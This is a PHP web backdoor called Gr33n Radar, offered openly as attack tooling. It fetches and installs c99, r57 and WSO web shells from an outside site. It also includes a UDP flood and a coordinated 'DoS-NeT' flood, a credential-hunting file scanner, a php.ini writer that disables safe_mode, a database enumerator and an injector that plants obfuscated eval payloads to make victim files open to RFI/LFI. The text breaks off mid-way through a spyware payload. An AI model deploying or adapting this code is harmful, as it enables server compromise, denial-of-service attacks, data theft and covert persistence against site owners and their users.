<?php
/*
#####################################################
# Name Software: Gr33n Radar Backdoor #
# version: 0.1 #
# language: PHP #
# Author: Emiliano Febbi #
# date: 21/04/2025 #
# site: http://nullsite.altervista.org/ #
# Contact: emilianofebbi.1994 -at- gmail -dot- com # - Manual backdoor -
#####################################################_________________________
|_____________________USAGE:________________________|_________________________|
| [1] - For Run backdoor: backdoor_name.php?backdoor=activation |
| [2] - War Mode is simple to use. With the DoS NeT Mode you can |
| connect up to ten backdoors inserting the full path and launch them. |
| |
| [3] - It is possible install predefined shells or customized. |
| [4] - The backdoor comes with a terminal with a built-in explanation. |
| [5] - At the bottom there is a scanner for detecting sensitive files. |
| [6] - You can install spyware and run it to spy on files of your choice |
| with just a few clicks. |
| [7] - There is also a php_injector with which you can infect files of your |
| choice using only PHP encoded code. The default code makes the victim |
| file vulnerable to RFI/LFI. To exploit the infected file: |
| infected_file.php?radar=../../ for LFI |
| or ?radar=http://www.site.com/shell.txt for RFI. |
| [8] - The backdoor does not work? launch the safe mode: |
| Emergency editor: backdoor_name.php?sm_editor=on |
| Current Directory files: backdoor_name.php?sm_exp=on |
| Root Files Explorer: backdoor_name.php?sm_root_exp=on |
|_____________________________________________________________________________|
| Description: |
|-----------------------------------------------------------------------------|
|Good alternative to a web shell, I would say superior. |
|The backdoor uses an obfuscation method to avoid detection, and also contains|
|an automatic scanner that detects open ports on the server. |
|_____________________________________________________________________________|
After used DoS-NeT attack click button Home , for restore script.
enjoi!
*/
$myname = $_SERVER['PHP_SELF'];
$identy = $_SERVER['SERVER_NAME'];
$today = date("F j, Y, g:i a", time());
//Code block shells installer (Thanks www.localroot.net)
/*------------------------------------------------------------------------------------*/
/* C99 */
/*------------------------------------------------------------------------------------*/
if (isset($_GET['installc99'])) { //|
$getc99 = file_get_contents("https://www.localroot.net/shell-c99-php-7.txt"); //|
$fp = fopen("c99.php","w"); //|
fputs ($fp,"$getc99"); //|
fclose($fp); //|
echo '<script>alert("c99 installed!")</script>'; //|
header( "refresh:1;url=$myname?backdoor=activation"); //|
}; //|
if (isset($_GET['deletec99'])) { //|
unlink("c99.php"); //|
echo '<script>alert("c99 removed!")</script>'; //|
header( "refresh:1;url=$myname?backdoor=activation"); //|
};; //|
/*------------------------------------------------------------------------------------*/
/*------------------------------------------------------------------------------------*/
/* r57 */
/*------------------------------------------------------------------------------------*/
if (isset($_GET['installr57'])) { //|
$getr57 = file_get_contents("https://www.localroot.net/shell-r57.txt"); //|
$fps = fopen("r57.php","w"); //|
fputs ($fps,"$getr57"); //|
fclose($fps); //|
echo '<script>alert("r57 installed!")</script>'; //|
header( "refresh:1;url=$myname?backdoor=activation"); //|
}; //|
if (isset($_GET['deleter57'])) { //|
unlink("r57.php"); //|
echo '<script>alert("r57 removed!")</script>'; //|
header( "refresh:1;url=$myname?backdoor=activation"); //|
};; //|
/*------------------------------------------------------------------------------------*/
/*------------------------------------------------------------------------------------*/
/* WSO */
/*------------------------------------------------------------------------------------*/
if (isset($_GET['installWSO'])) { //|
$getWSO = file_get_contents("https://www.localroot.net/shell-wso-php-7.txt"); //|
$fpWSO = fopen("WSO.php","w"); //|
fputs ($fpWSO,"$getWSO"); //|
fclose($fpWSO); //|
echo '<script>alert("WSO installed!")</script>'; //|
header( "refresh:1;url=$myname?backdoor=activation"); //|
}; //|
if (isset($_GET['deleteWSO'])) { //|
unlink("WSO.php"); //|
echo '<script>alert("WSO removed!")</script>'; //|
header( "refresh:1;url=$myname?backdoor=activation"); //|
};; //|
/*------------------------------------------------------------------------------------*/
//For activate backdoor <-- filename.php?backdoor=activation -->
if(!empty($_GET['backdoor']=="activation")) {
print '<center><pre>Welcome to';
print '
_ _ _ _ _
(_)(_)(_)(_) _ (_)
(_) (_) _ _ _ _ _ _ (_) _ _ _ _ _ _
(_) _ _ _ (_) (_)(_)(_) _ _(_)(_)(_)(_) (_)(_)(_) _ (_)_ _ (_)(_)
(_)(_)(_)(_) _ _ _ (_) (_) (_) _ _ _ (_) (_)(_)
(_) (_) _ _(_)(_)(_)(_) (_) (_) _(_)(_)(_)(_) (_)
(_) (_) _(_)_ _ _ (_)_(_)_ _ _ (_)(_)_ _ _ (_)_ (_)
(_) (_) (_)(_)(_) (_) (_)(_)(_)(_) (_)(_)(_) (_)(_)
backd00r
';
print "</pre></center><br>";
print ' <style>
.WARMODE { animation: warm 1s infinite; }
@keyframes warm { 0% {background-color: red;} 25%{background-color:lime;}
50%{background-color:red;} 75%{background-color:lime;} 100% {background-color: red;} }
</style>';
print "<div style='float: left; text-align: left;'>$today</div>
<a href='?backdoor=activation&mode=war'><button class='WARMODE' style='width:965px;'>WAR MODE</button></a>
<div style='float: right; text-align: right;'>
<a href='?backdoor=activation&scanme=do'><font color='lime'>$identy</font><a><a href='$myname?backdoor=activation'>
<button style='background-color:#00ffff'>~Home</button></a></div><br>";
//#Single DoS and DoS Net
/*------------------------------------------------------------------------------------*/
/* War Mode */
/*------------------------------------------------------------------------------------*/
//# --Single UDP Flood--
$j = "
/ \ `. __..-,O
: \ --''_..-'.'
| . .-' `. '.
: . .`.'
\ `. / ..
\ `. ' .
`, `. \
,|,`. `-.\
'.|| ``-...__..-`
| |
|__|
/||\
//||\\
// || \\
__//__||__\\__
'--------------'";
if(!empty($_GET['backdoor']=="activation" and $_GET['mode']=="war" )) {
echo "<center><pre> $j </pre></center>";
echo '<center><div style="width:200px; height:40px; border:1px solid lime;">
<font color="lime"><br><b>--UDP Flood--</b></font></div><br>
<form action=? method=GET>
<input type="hidden" name="backdoor" value="activation">
IP address: <br><input type=text style="background-color:#00ffff" name=host value=><br>
Length (seconds): <br><input type=text style="background-color:#00ffff" name=time value=><br>
<input type=submit class="WARMODE" value=ON></form></center>';
//#DoS-NeT --UDP Flood--
echo' <center><form action="'.$SERVER[PHP_SELF].'" method="POST">
<div style="width:200px; height:40px; border:1px solid lime;">
<font color="lime"><br><b>--DoS-NeT Flood--</b></div><br>
IP Address:<br>
<input type="text" style="background-color:#00ffff" name="ip_adrrs" value="127.0.01"><br>
Length (seconds):<br>
<input type="text" style="background-color:#00ffff" name="dos_time" value=""><br>
All backdoors positions:<br>
<input type="text" style="background-color:#00ffff" name="net1" value="https://www.site.com/backdoor_path.php"><br>
<input type="text" style="background-color:#00ffff" name="net2" value="https://www.site.com/backdoor_path.php"><br>
<input type="text" style="background-color:#00ffff" name="net3" value="https://www.site.com/backdoor_path.php"><br>
<input type="text" style="background-color:#00ffff" name="net4" value="https://www.site.com/backdoor_path.php"><br>
<input type="text" style="background-color:#00ffff" name="net5" value="https://www.site.com/backdoor_path.php"><br>
<input type="text" style="background-color:#00ffff" name="net6" value="https://www.site.com/backdoor_path.php"><br>
<input type="text" style="background-color:#00ffff" name="net7" value="https://www.site.com/backdoor_path.php"><br>
<input type="text" style="background-color:#00ffff" name="net8" value="https://www.site.com/backdoor_path.php"><br>
<input type="text" style="background-color:#00ffff" name="net9" value="https://www.site.com/backdoor_path.php"><br>
<input type="text" style="background-color:#00ffff" name="net10" value="https://www.site.com/backdoor_path.php"><br>
<input type=submit class="WARMODE" value=Massive_Attack></form></center></form></center>';
}
if(isset($_GET['host'])&&isset($_GET['time'])) {
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);
$exec_time = $_GET['time'];
$time = time();
$max_time = $time+$exec_time;
$host = $_GET['host'];
for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time) {
break;
}
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp) {
fwrite($fp, $out);
fclose($fp);
}
}
echo "<center><pre> $j </pre></center>";
$host_r = strip_tags("$host", ENT_QUOTES);
print "<script>alert('--DoS Completed--FROM $identy To $host_r')</script>";
print_r ("<center><font color='lime'><br><div style='width:200px; height:40px; border:1px solid lime;'><b>--UDP Flood--</b>
</div><br>[$host_r] ~ Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets for second</font> \n");
echo '<br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="backdoor" value="activation">
IP address: <br><input type=text style="background-color:#00ffff" name=host><br>
Length (seconds): <br><input type=text style="background-color:#00ffff" name=time><br>
<input type=submit class="WARMODE" value=ON></form></center>';
header( "refresh:3;url=$myname?backdoor=activation");
}
//#DoS-NeT --UDP Flood 2--
/*------------------------------------------------------------------------------------*/
/* DoS-NeT code */
/*------------------------------------------------------------------------------------*/
eval(gzuncompress(base64_decode(str_rot13('rWl1yA9XjmNHu+/7STTZEF/phi4iAuBsDZTOS6BHefy
fpYnFOe0DsKoo1qExDKVu6IK4mvU9swyj6BSvKgmsCJk3xY4JWJnftmxbTjjRkz1KpCcPrgllvGnRemKv9pEEx
n81OEbWAEWcWVo52p2W1cCdvv7ZY8TUZksMNNW63TgaYxWX9q/psK24F6dA6HshdqjG3Sr5Y3vt8xQjHBJu4WU
XV8SwyprPWlcCOR9Iax653YAt7yNuIq2PJInEuuB22K3y4Nb8ycFQoH3N7MRjiykzr7nMGn30jZe+NFyTjl14Q
DTa/RwD+SwtaJWrV+uPHOC6ICCGfJZItvrWz31MCrB2MnvfBU0eBJ2oEq12UR2mJjmGDABb4PMows/8J8XGWGl
GuTqUjcpysWBRo0pvxPHPx0EtElXHW
HXGETuUVcVyVcARMRpvyvIvx0EfElXEWEXGETWUVcHyHcARnxrv33algaXA68e9y4pQGy+2+yziiqsaA+G0pKD=
'))));
//#Server Autoscanner--
if(!empty($_GET['backdoor']=="activation" and $_GET['scanme'])) {
echo "<center><font color='lime'><i>Scanner $identy results:</i></font></center><br>";
ini_set('max_execution_time', 0);
ini_set('memory_limit', -1);
$portsz = array(21, 22, 25, 80, 81, 110, 143, 443, 587, 2525, 3306);
foreach ($portsz as $portz) {
$connectionzx = @fsockopen($identy, $portz, $errno, $errstr, 2);
if (is_resource($connectionzx))
{
echo '<center><pre>' . $identy . ':' . $portz . ' ' . '(' . getservbyport($portz, 'tcp') . ') is open.</pre></center>' . "\n";
fclose($connectionzx);
}
else
{
echo '<center><pre>' . $identy . ':' . $portz . ' is closed.</pre></center>' . "\n";
}
}
} //scanner end
/*------------------------------------------------------------------------------------*/
/* War Mode End */
/*------------------------------------------------------------------------------------*/
print '<html><head><title>Gr33N Radar Backdoor v0.1</title><style> body {
cursor: crosshair;
min-height: 200vh; }</style>
</head><body><center><body bgcolor="#000000">
<body text="#00ffff"><body link="#008080">
<body vlink="#008080">
<div style="width:100%;border:10px ridge aqua;box-sizing: border-box;">';
echo "<h2>--PHP Shells Management--</h2>";
if (false!==file("c99.php")) echo "<font color='red'>c99 2.0 shell installed</font> - <a href='c99.php'>view</a> / <a href='?deletec99=do'>~delete</a>";
else echo ' <a href="?installc99=do"><font color="lime">install c99 2.0 shell</font></a>';
print "<br>";
if (false!==file("r57.php")) echo "<font color='red'>r57 shell installed</font> - <a href='r57.php'>view</a> / <a href='?deleter57=do'>~delete</a>";
else echo ' <a href="?installr57=do"><font color="lime">install r57 shell</font></a>';
print "<br>";
if (false!==file("WSO.php")) echo "<font color='red'>WSO shell installed</font> - <a href='WSO.php'>view</a> / <a href='?deleteWSO=do'>~delete</a>";
else echo ' <a href="?installWSO=do"><font color="lime">install WSO shell</font></a>';
print "</div><br>";
//#Favorite Shell installer
echo '<div style="width:100%; height:50%; border:10px ridge aqua;box-sizing: border-box;">
<h2>Install external PHP File:\_</h2>
<form action="'.$SERVER[PHP_SELF].'" method="POST">
<input type="text" style="background-color:#00ffff" name="favorite" value="http://www.site.com/shell.txt"><br>
<input type="text" style="background-color:#00ffff" name="favorite_nm" value="filename.php"><br>
<input type="submit" style="background-color:#00ffff" value="install"/></form><br>
<h3>--Favorites Shells installed--</h3>';
if(!empty($_POST['favorite'] && $_POST['favorite_nm'])) {
$install_fav = $_POST['favorite'];
$install_fav_nm = $_POST['favorite_nm'];
$getsfav = file_get_contents("$install_fav");
$fpp = fopen("bck_$install_fav_nm","w");
fputs ($fpp,"$getsfav");
fclose($fpp);
$realnmm = basename($install_fav);
echo "<script>alert('$realnmm installed!')</script>";
};;;
//listing your external installations
$ext = array("php","html","htm",);
foreach ($ext as $extt) {
foreach (glob("./*.$extt") as $filename) {
$prefix = 'bck_';
if (strpos($filename, $prefix) != false) {
$cleanme = basename($filename);
echo "- <a href='$cleanme'><font color='lime'>$cleanme</font></a><br>";
}
}
};;;;
/*------------------------------------------------------------------------------------*/
/* #Terminal version 0.1 */
/*------------------------------------------------------------------------------------*/
echo'</div><br><div style="width:100%;border:10px ridge aqua;box-sizing: border-box;"><font color="lime">
<br><div style="width:400px; height:280px; border:1px solid lime;"><i>#HELP--</i><br><-- Terminal Commands --><br>
"rename" = rename file<br>
"unistall" = unistall backdoor<br>
"wget https://www.site.com/file.jpg" = wget file<br>
"delete" = delete file<br>
"getSRVip" = see server IP <br>
"phpinfo" = phpinfo calling<br>
"system" = see system info<br>
"mysql" = database INFO<br>
"php.ini" = set safe_mode off & shell_exec = On<br>
"php_uname" = get php_uname INFO<br>
"disabled_func" = PHP Disabled Functions<br>
"open_basedir" = Alloweds paths for using PHP<br>
"memory_d" = Memory disk INFO<br></div>
<br>Terminal:\_</font><br>
<form action="'.$SERVER[PHP_SELF].'" method="POST">
<textarea name="command" rows="10" cols="50" style="background-color: aqua;color:#000000;">~backdoor>> command</textarea><br>
</font>
<input type="submit" value="execute" style="background-color:#00ffff">
</form>';
if($_POST['command'] == "~backdoor>> rename") {
$ren = $_POST['command'];
$rename = '~backdoor>> rename';
if (strpos($ren, $rename) != true) {
echo'<form action="'.$SERVER[PHP_SELF].'" method="POST">
<input type="text" name="oldname" style="background-color: aqua;color:#000000;" value="oldname.format">
<input type="text" name="newname" style="background-color: aqua;color:#000000;" value="newname.format">
<input type="submit" value="rename" style="background-color:#00ffff">
</form>';
}
}
//#rename
if($_POST['oldname'] and $_POST['newname']) {
$olddname = $_POST['oldname'];
$newwname = $_POST['newname'];
rename($olddname , $newwname);
echo '<script>alert("renamed file!")</script>';
};;
//#unistall
if($_POST['command'] == "~backdoor>> unistall") {
$unistall_me = $_SERVER['PHP_SELF'];
unlink(basename($unistall_me));
echo '<script>alert("backdoor uninstalled!")</script>';
}
//#wget
if(strpos($_POST['command'] , '~backdoor>> wget') !== false) {
$uno = "~backdoor>> wget ";
$wget = $_POST['command'];
$due = "";
$url = str_replace($uno,$due,$wget);
$fileee = file_get_contents($url);
$nameeee = basename($url);
$exttt = pathinfo($url, PATHINFO_EXTENSION);
$namee2 =pathinfo($url, PATHINFO_FILENAME);
$processing = "wget.txt";
$fp = fopen($processing,"w");
fputs ($fp,"$url");
fclose($fp);
$line = file($processing)[0];
$grabbing = file_get_contents("$line");
$fp = fopen("$namee2.$exttt","w");
fputs ($fp,"$grabbing");
fclose($fp);
unlink("wget.txt");
};
//#delete
if($_POST['command'] == "~backdoor>> delete") {
echo'<form action="'.$SERVER[PHP_SELF].'" method="POST">
<input type="text" name="deletef" style="background-color: aqua;color:#000000;" value="filename.php">
<input type="submit" value="delete" style="background-color:#00ffff">
</form>';
}
if (isset($_POST['deletef'])) {
$trashfile = $_POST['deletef'];
unlink("$trashfile");
echo "<script>alert('$trashfile deleted!')</script>";
}
//#GeT Server IP
if($_POST['command'] == "~backdoor>> getSRVip") {
$getSRVip = getHostByName(getHostName());
$userADDr = $_SERVER['REMOTE_ADDR'];
echo "Server addr. $getSRVip<br>";
echo "Your addr. $userADDr";
echo "</div>";
}
//#phpinfo
if($_POST['command'] == "~backdoor>> phpinfo") {
echo phpinfo();
}
//#system info
if($_POST['command'] == "~backdoor>> system") {
$Wserver = $_SERVER['SERVER_SOFTWARE'];
echo "<i>Web server</i> :. $Wserver";
echo "<br><i>system</i> :. ";
echo PHP_OS;
echo "<br><i>System admin </i> :. ";
echo $_SERVER['SERVER_ADMIN'];
}
//#MySQL dedicate
if($_POST['command'] == "~backdoor>> mysql") {
echo '<form action="'.$SERVER[PHP_SELF].'" method="POST">
<input type="text" style="background-color:#00ffff" name="dbuser" value="database user"><br>
<input type="text" style="background-color:#00ffff" name="dbpass" value="database pwd"> <br>
<input type="text" style="background-color:#00ffff" name="dbname" value="database Name"><br>
<input type="submit" style="background-color:#00ffff" value="execute"/></form><br>';
}
if(!empty($_POST['dbuser'] && $_POST['dbpass'] && $_POST['dbname'])) {
$dbhost = "localhost";
$dbuser = $_POST['dbuser'];
$dbpass = $_POST['dbpass'];
$dbname = $_POST['dbname'];
$conn = new mysqli($dbhost, $dbuser, $dbpass, $dbname);
//connection
if($conn->connect_error) {
die("Connection failed! " . $conn->connect_error);
}
//#db version
echo '<div style="width:200px; height:30px; border:1px solid lime;">
<font color="lime">Database Version:</font></div>';
echo mysqli_get_client_info();
//#tables
$sql = "SHOW TABLES";
$result = $conn->query($sql);
if($result->num_rows > 0) {
echo '<br><br><div style="width:200px; height:30px; border:1px solid lime;">
<font color="lime">Tables List on Current DB:</font></div>';
while($row = $result->fetch_array()) {
echo "-----> ";
echo $row[0] . "<br>";
}
} else {
echo "<br>No tables Found<br>";
}
//databases();
$sql2 = "SHOW DATABASES";
$resultt = $conn->query($sql2);
if($resultt->num_rows > 0) {
echo '<br><div style="width:200px; height:30px; border:1px solid lime;">
<font color="lime">Databases List:</font></div>';
while($roww = $resultt->fetch_array()) {
echo "-----> ";
echo $roww[0] . "<br>";
}
}
$conn->close();
};
//#safe_mode OFF && shell_exec On
if($_POST['command'] == "~backdoor>> php.ini") {
if (!file_exists("php.ini")) {
$writePHP = fopen("php.ini", 'a');
fwrite($writePHP, "safe_mode = off\nexec = On\nshell_exec = On ");
fclose($writePHP);
echo "php.ini installed - safe_mode is off now!<br>";
} elseif (file_exists("php.ini")) {
echo "<script>alert('php.ini already exist!')</script>";
}
}
//#php_uname command
if($_POST['command'] == "~backdoor>> php_uname") {
print php_uname();
}
//#php functions blocked
if($_POST['command'] == "~backdoor>> disabled_func") {
$disabled_funcSRV = @ini_get("disable_functions");
print "-----> PHP Disabled Functions on $identy<br>";
print_r ("~[$disabled_funcSRV]");
}
//#alloweds paths for working with --PHP--
if($_POST['command'] == "~backdoor>> open_basedir") {
$obx = @ini_get("open_basedir");
print "-----> Alloweds paths By PHP<br>";
print_r ("~[$obx]");
}
//#Srv disk --memory--
if($_POST['command'] == "~backdoor>> memory_d") {
$sdir = '/';
//get disk space free (in bytes)
$disk_free = disk_free_space($sdir);
$disk_total = disk_total_space($sdir);
$disk_used = $disk_total - $disk_free;
$disk_used_p = sprintf('%.2f',($disk_used / $disk_total) * 100);
function convertSize( $bytes )
{
$sizes = array( 'B', 'KB', 'MB', 'GB', 'TB' );
for( $i = 0; $bytes >= 1024 && $i < ( count( $sizes ) -1 ); $bytes /= 1024, $i++ );
return( round( $bytes, 2 ) . " " . $sizes[$i] );
}
$disk_free = convertSize($disk_free);
$disk_used = convertSize($disk_used);
$disk_total = convertSize($disk_total);
echo '<center>
<div style="width:160px; height:30px; border:1px solid lime;">
<font color="lime">[Memory Disk INFO:]</font></div><br>';
echo "~Total: $disk_total<br>";
echo "~Used: ".$disk_used." ($disk_used_p%)<br>";
echo "~Free: $disk_free<br>";
echo "</center>";
}
//#terminal end
echo '</div></table><div style="float: left; text-align: left;"><a href="?intF=do"><h1><font color="lime">?#</font></h1></a><i>interessing Files</i></div>';
echo '<div style="float: right; text-align: right;"> <a href="?inj_=do"><h1><font color="lime">?#</font></h1></a><i>RFI/LFI --PHP_Injector</i></div>';
echo '<div style="float: center; text-align: center;">';
echo '<a href="?spyware_=do"><h1><font color="lime">?#</font></h1></a><i>Spyware installation</i><br>';
//using spyware
if (false!==file("system_sql.php")) echo "<font color='red'>spyware installed</font> - <a href='bconfiguration.txt'>view logs</a> / <a href='?delspy=do'>~delete</a><br>
<a href='?filespy=do'><font color='lime'>[~] - Select File to Spy</font></a>";
else echo '<a href="?installspy=do"><font color="lime">install spyware</font></a>';
echo'</div>';
echo '<center><br>
[Code By Emiliano Febbi]
~My Site:<a href="http://nullsite.altervista.org">
<font color="lime">nullsite.altervista.org</font></a>';
echo "</center></body></html>";
} else {
//Backdoor --obfuscation System--
$hostname = $_SERVER['HTTP_HOST'];
$curl = curl_init("http://$hostname");
curl_setopt($curl, CURLOPT_NOBODY, true);
$result_ = curl_exec($curl);
if ($result_ !== false) {
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($statusCode == 404) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://'.$hostname.'/404site');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
else {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://'.$hostname.'/404site');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
}
else {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://'.$hostname.'/404site');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
};;;;;
/*---------------------------------------------------------------------------------------------------------*/
/* Backdoor #HELPER 0.1 */
/*---------------------------------------------------------------------------------------------------------*/
//sensitive files checker
$myname2 = basename($myname);
if (isset($_GET['intF'])) {
print '<html><body><body text="#00ffff">
<center><br><a href="?backdoor=activation">
<button style="background-color:#00ffff">~Home</button></a>
<br><div style="width:200px; height:30px; border:1px solid lime;">
<font color="lime">
#Sensitive Files List:</font></div>';
$sensitive = array("user", "username", "password", "pwd", "pass", "config",
"dbhost", "dbuname", "dbname", "dbpass", "dbtype", "admin",
"root", "md5", "dbuser", "ftp", "database", "users", "user_name",
"login", "host", "db", "ftp_host", "ftp_pass", "ftp_user", "ftp_root",
"prefix");
foreach($sensitive as $sensitive_files) {
$dir777 = './';
$files777 = scandir($dir777,1);
foreach ($files777 as $lines777) {
if(strlen($lines777) > 3 && strpos($lines777, '.php', '.html', '.txt', '.asp', '.aspx', '.js') !== false) {
$readfile777 = fopen('./'.$lines777, 'r');
while(!feof($readfile777)) {
$contents777 = fgets($readfile777);
if(strpos($contents777, $sensitive_files) !== false)
echo str_replace("$myname2", "" , "<br>$lines777");
}
fclose($readfile777);
}
}
}
}
//#PHP_Injector
if (isset($_GET['inj_'])) {
// LFI ~ RFI
//For activate RFI/LFI on victime Page infected <-- filename.php?radar=../ or filename.php?radar=http://www.site.com/shell.txt -->
echo'<center><br><a href="?backdoor=activation">
<button style="background-color:#00ffff">~Home</button></a><br>
<div style="width:350px; height:50px; border:1px solid lime;">
<font color="lime">--Bad Code injector [Default code] - RFI/LFI page infection</font></div><br>
<form action="'.$SERVER[PHP_SELF].'" method="POST">
<input type="text" style="background-color:#00ffff" name="file_nameinj" value="filename.php"><br>
<textarea name="php_injection" rows="10" cols="50" style="background-color: aqua;color:#000000;">
eval(str_rot13(gzinflate(str_rot13(base64_decode("
LUjHDva4DXyaxWFh7gU5uX7uvV8C9967nz5p/hgGWcnSVRySw6Ue
7n+2/ojXeyiXf8ahSzDkP/
MyJfPyQj40SH7/f/C3rPIwkPwGWonWlpzNcwyvdpQvf5hhisMNQp
la8/oLsusaSoN5cxKrP/
lqnBKFzNr2eIWT9heki7y2b3bsvhNHunalAr7WOx++n1oWonMLGK
tCo74b4jYTIZzJzy0LZ
E8FylDIday9JTctecpRvGrbzyB9IymlvXwHU7hpGWlVr8nLWCudY
JAfdctUUHCCoo8Y6fT+KrM
rMvWMMKEnY6a4Ix21cp4nZ3a61AtmFgBB2vEZq03BdFvtaE+vWED
e40NJ2QYDsd/dIHkPL8m
cVrMEC9mW8kQLT92cGq8XvsQPShyu7Dz4F/vEjIUW+ab2nhwDFYs
Pka90ovr5P7/QJ9S9J
oDyzwAeQRDcNi3CHCgPptuTpGOFwiyjoLxsMSatlNgXI+7KQLvCf
iQOFxBr0Y18tLebH
ItHYqHLlbYDG5qy1wMHj86aJ2Rek1ydl13LZlRdxfVIeRsf50hCD
QkXA3Lv6Ss8UYPrUe/
8oPYfm/6LWL9TR467zfPDnpZ/b0iqSdAr8hcxoiNENH3nY1AE+qu
FfDeCzJvIVms6BNLjj
ePuKGOGBbco+czXWqgexZWKar4UfiRrUD+5+Cm16hUpkvM5jDVWv
uPDh+jAT9m2+nTHzlweW
/8YaU4mwNyWV5qktEbGYg7Y8fKuuF3F05mhYRarNny1w1aV0t3u4
XSCm422dhQeTaZ73K7GBlj/nm/
L5SWPViG/Nx2UhC0Q4wSd3XIjSGJozd4I6bP0xdPUuLtm8eqJ7LF
ADx8fIxgrxNFPUfBkCcJLntlVN
D4Qcy5d5C5RsfwqnpqFKQB/
Ai1KXyb1I25G7o4p8+lHR4Z1As1eY6TsAREbV8avmbmjFx9YYPSH
abWjMtCRm9jAVQLrmsiPk6wkWc5bPl+GF
N9hXq96vpiUGqGRw
/GdXhdgfKEnT+WzwfeLKjLcw2OEfm82SGBHHXfnVjAzxvPGeRfcH
UHeeKnpmMY3CTD8k2khwQDZE9ZecSvwMt
pLh5kLC2fD1g3uGcW0+
RVDHIhv2mjHC5aE0Xolz3LBnQI5E07gXEDse3Qfa/
tLX15DQhhmrRRjhA3Rxuq08UIGXDXFAxRTrK7a9JCpw0eLcU0SmGlO/
6TY8bGfZ5Z0t3248RpILJ6iHo00gjij0z5CHcH5rk7I+vprzG0Fv+
gE7YdGmAWOv3M/DmsXmEnhSmVNg7q/
VVNJfB3vuVR5fEVl316ZOu+HfgLvwEU+NOsKa8Cg6GVTKqlup5oY
PgmDnC0+bkUP8QIhiUjXeEk+CtZ4i25OGYN8an6aEzouN27DEv+KN
djzC2HrpyM771G
yQ3TyJx5CvKW/hPWZ2M2QlaPWlFGP1W0+j26pmdD4wwnFOdleR/
v8MltYqcBrzEI8G+80mGHuKsFeFzUeGp+XXir2YdGqDqs06a3LI1s
RCAYTqRCb8+rswo/
xuI7kzLEPS3ajxIOWctjaLpc4GNwGSrwWVAJOhZuk4yexv2y4x/cs
7tjfG1WGnceNaUTYUtK/
xEzXJ1dUNxjQDMg9tS1TEYWwvdlYlOkTo4dIjL3pRJaNFu22eZ3W1
rQ0NtGj37
7CX50yTFGwM3DoHL5Jcxcu43pFBVOeUEseRHyMrENmsrL6OjjpKab
nhh4YnE4VHNMDV3ZZalQAjIPg3E6dY/
PEPXvBz3cmv85JUekNo625J8hQSIKUWAl7Prsm/ND25SzWAT0a/mc
wLG0VFfVep6uBL1Z2XJBQoIQ7ZBvznI
ut8VE0tDV0Xsy
9eqXL3fyazX7xsCRmtaNKKUfdhKiS4AjPN7cJn3ltvBtM0Fd2sou0
PsYyFl4YMUakmrTTSyTFmT2ACmXHFR/
qlCtZ2v2dLmDjpwRHexy/vEJJVzbHfNdanyjODbWgadDV34pYTErO
v/ndbov0cwXP6KhtF/
I40aKhKKnWsA6rCqlGzeAC+haqXZqD5ZAM6UCjpnliKzpSPt+eyRD
Whjr0XQmgrv/
yZHkNr+IIJS4Twk728Ry6ZR1wmJDtdOYvysVK1ENIhuLmVf1NNwg+
N7dfgDnTv9Pa7lKjRlgx8mAdz99m9Mqg3qSR
/eJXnL/
khpWVU89pFl9uFBeLk5LHSFcTreWAuEuW3wt3WOIbnCGXAnnm1fA+
lFccYwnQiWEem8urU28ITNTrEwagrifIRyM/
svmvQQJM5zrS5I0G3luEwHMgoAHvCGctvEJTYIq6wgcPYgYnhl2vR
TLfXNELQYK0R5c0iDYZ81dXDataLW2Qu+W6
+vqz1cI31IV587V1ORksfils5IctjlrulH3vz2c9hjdWwqrHfb9H1
rN689cXctBnJ2oU1o2H5Zhqm/
0UvJbs5CvLWXmJHxWfR9uE+2+uXj5o+3+q970l9ee7Wn/B5t//bZ9//xc=")))));</textarea><br>
</font><input type="submit" value="INJECTION" style="background-color:#00ffff">
</form>';
if (!empty($_POST['file_nameinj'] and $_POST['php_injection'])) {
$file_nameinj = $_POST['file_nameinj'];
$php_injection = $_POST['php_injection'];
rename("$file_nameinj", "$file_nameinj.txt");
$target_x = "3";
$statsz = file("$file_nameinj.txt", FILE_IGNORE_NEW_LINES);
$offsetb = array_search($target_x,$statsz) +1;
array_splice($statsz, $offsetb, 0, $php_injection);
file_put_contents("$file_nameinj.txt", join("\n", $statsz));
$format_erase = str_replace(".txt", "", "$file_nameinj.txt");
rename("$file_nameinj.txt", "$format_erase");
print "<script>alert('$format_erase now is vulnerable!')</script>";
}
}
//_______________________________
//|#Spyware Block code dedicated |
//|______________________________|
if (isset($_GET['delspy'])) {
unlink("bconfiguration.txt");
unlink("system_sql.php");
echo '<script>alert("spyware removed!")</script>';
header( "refresh:1;url=$myname?backdoor=activation");
}
if (isset($_GET['installspy'])) {
/*--------------------------*/
/*| Creation File Spyware |*/
/*--------------------------*/
$spyware_code = "<?
eval(str_rot13(gzinflate(str_rot13(base64_decode('LUnHEqw4EvyaiWx7w5vYE9433l42Gu99475+xMRlAIRXTFNWpdZzvP/
sw/Hd7rFN/1lwuRLY/5ZoQZf1QjG2aGT/f/
C3plm+k0qqzSFm83bjNavL1jercGrs7IH623Yaf8L+T1ntTaZEFJnFFyDMJNAND7GdH+CpnaRAdP5P3OPbFBDhWQa5l2CIZbS5yOdVN5W
f7b68jrODsQVBn5F0CQZ6bV+kQ0wi++14ABwY6k1F++HhtTXYiu8uXhhPwyQM7ddgnY8u9MfyhV1G8g+oE7vNCSyzk5wvvG2wvBBhOj+s
obsFDbAcQlekb4IZJKQQSeDcGJUZGpWiW3h+0OcAJhdVypU7Rg0Z9WokhOsjyD5VUv6MnrEKIlg6FbvCz7efDRar1hITqVoxPwPNBZfDm
YQDHzfAZLtRaa1fKK2YiptvZLuXCz4Lk/52G+0azrZupjTqwjuCNjCBlV8Jht3sYCzCYJU5IUwv3G6tK2KLVCxidKxdmD4gOAjbIc/3xe
